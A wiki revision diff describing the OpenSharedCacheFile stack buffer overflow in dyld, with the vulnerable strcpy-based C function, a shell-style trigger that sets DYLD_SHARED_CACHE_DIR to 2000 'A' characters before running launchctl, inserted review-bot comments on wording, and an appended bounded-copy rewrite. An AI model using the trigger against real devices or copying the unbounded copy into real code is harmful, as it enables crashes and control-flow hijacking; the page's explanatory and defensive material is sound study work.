Difference between revisions of "OpenSharedCacheFile"
(→Triggering the vuln =) |
m (Grammar dude! Stub too.) |
||
Line 1: | Line 1: | ||
− | The OpenSharedCacheFile bug was found by i0n1c |
+ | The OpenSharedCacheFile bug was found by [[i0n1c]]. This bug is a simple stack overflow. |
== Opensharedcachefile() function == |
== Opensharedcachefile() function == |
||
int openSharedCacheFile() |
int openSharedCacheFile() |
||
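Review bot: the heading in this hunk, "Opensharedcachefile() function", does not match the function name shown directly under it, "int openSharedCacheFile()"; use the function's own capitalisation in the heading. In the changed line, "a simple stack overflow" would be clearer as "a stack buffer overflow", since the function body on the page copies into a fixed "char path[1024]" on the stack.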
Line 16: | Line 16: | ||
DYLD_SHARED_REGION = private /bin/launchctl |
DYLD_SHARED_REGION = private /bin/launchctl |
||
This will overflow the PC register making it a stack overflow. |
This will overflow the PC register making it a stack overflow. |
||
+ | |||
+ | {{stub}} |
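Review bot: the context line "This will overflow the PC register making it a stack overflow." is left untouched by an edit summarised as a grammar fix, and it is inaccurate as worded: the overflow is of the stack buffer, and PC is affected only because the saved return address is overwritten. Suggest rewording that sentence in the same edit. The trigger line above it also mixes shell syntax with the shorthand "A" * 2000 and has spaces around "="; mark it as shorthand or put it in a preformatted block.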
Revision as of 10:55, 23 March 2015
The OpenSharedCacheFile bug was found by i0n1c. This bug is a simple stack buffer overflow.
    int openSharedCacheFile()
    {
        char path[1024];                 // fixed-size buffer on the stack
        strcpy(path, sSharedCacheDir);   // unbounded copy: no length check on sSharedCacheDir
        strcat(path, "/");
        strcat(path, DYLD_SHARED_CACHE_BASE_NAME ARCH_NAME);
        return ::open(path, O_RDONLY);
    }
Triggering the vuln
To trigger it, run the following (the first variable is set to a string of 2000 "A" characters):
    DYLD_SHARED_CACHE_DIR = "A" * 2000 \
    DYLD_SHARED_REGION = private /bin/launchctl
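The 2000-byte value overflows the 1024-byte path buffer on the stack and overwrites the saved return address, so the PC register is loaded with the overflowing data when the function returns, making it a stack overflow.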
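For comparison, a bounded version of the same path construction, as an added example (not code from this page and not Apple's actual fix). The names build_cache_path and open_shared_cache_file_checked are hypothetical, and the two macro values and the sample directory are assumed for illustration.

```c
#include <errno.h>
#include <fcntl.h>
#include <stdio.h>
#include <string.h>

/* Placeholder values, assumed for this example (not taken from the page). */
#define DYLD_SHARED_CACHE_BASE_NAME "dyld_shared_cache_"
#define ARCH_NAME "armv7"

/*
 * Build "<dir>/<base name><arch>" into out[out_len].
 * Returns 0 on success, -1 with errno = ENAMETOOLONG if it does not fit.
 */
static int build_cache_path(char *out, size_t out_len, const char *dir)
{
    int n = snprintf(out, out_len, "%s/%s", dir,
                     DYLD_SHARED_CACHE_BASE_NAME ARCH_NAME);
    if (n < 0 || (size_t)n >= out_len) {
        if (out_len > 0)
            out[0] = '\0';      /* never leave a truncated path behind */
        errno = ENAMETOOLONG;
        return -1;
    }
    return 0;
}

/* Bounded counterpart of openSharedCacheFile(); dir stands in for sSharedCacheDir. */
static int open_shared_cache_file_checked(const char *dir)
{
    char path[1024];
    if (build_cache_path(path, sizeof(path), dir) != 0)
        return -1;              /* reject instead of writing past path[] */
    return open(path, O_RDONLY);
}

int main(void)
{
    char long_dir[2001];        /* constructed input: 2000 'A' bytes */
    char path[1024];

    memset(long_dir, 'A', 2000);
    long_dir[2000] = '\0';
    /* "/var/db/dyld" is a constructed sample directory. */
    printf("normal dir: %d\n", build_cache_path(path, sizeof(path), "/var/db/dyld"));
    printf("2000 x 'A': %d\n", build_cache_path(path, sizeof(path), long_dir));
    printf("open, 2000 x 'A': %d\n", open_shared_cache_file_checked(long_dir));
    return 0;
}
```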